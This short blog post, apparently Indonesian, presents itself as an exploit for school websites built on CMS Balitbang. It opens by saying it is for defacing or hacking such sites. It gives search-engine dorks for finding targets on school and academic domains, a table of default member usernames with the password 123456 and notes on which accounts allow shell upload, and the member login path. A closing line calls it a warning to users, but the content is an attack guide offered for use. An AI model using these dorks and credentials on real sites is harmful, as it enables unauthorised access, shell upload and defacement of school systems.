Dork Web Sekolah CMS Balitbang Exploit
Exploit Ini Bisa Digunakam untuk Deface Web/Hack Web Berbasis Cms Balitbang, Berhasil Jika Bug Default User Dan Member Belum Di Hapus/Diganti, jika Gagal Berusaha Carilah Yang Masih Belum Diganti :) Karena Hacking butuh Perjuangan
Dangerous Default Member Password – CMS Balitbang Bug’sTrack
./start
dork in google..
1. inurl:"/html/index.php" intext:"Tim Balitbang"
2. inurl:"/html/index.php" intitle:"Selamat Datang"
3. inurl:"/member/" intext:"Tim Balitbang"
dork in bing..
1. IP:[target-IP] /html/
2. IP:[target-IP] sch.id
3. IP:[target-IP] ac.id
4. IP:[target-IP] blablablaa… having fun! :D
./issue
login member using default user and password
USERNAME PASSWORD DETAILS SHELL UPLOAD
alan 123456 guru aviable
kickdody 123456 guru aviable
070810120 123456 siswa not aviable
siswanto 123456 guru aviable
alumni 123456 guru not aviable
tomi 123456 guru aviable
./ending
sign in member form,,,
http://localhost/member/
./Semoga bermanfaat, dan ini sebuah peringatan kecil untuk siapa saja para pengguna CMS-Balitbang!
0 comments:
Post a Comment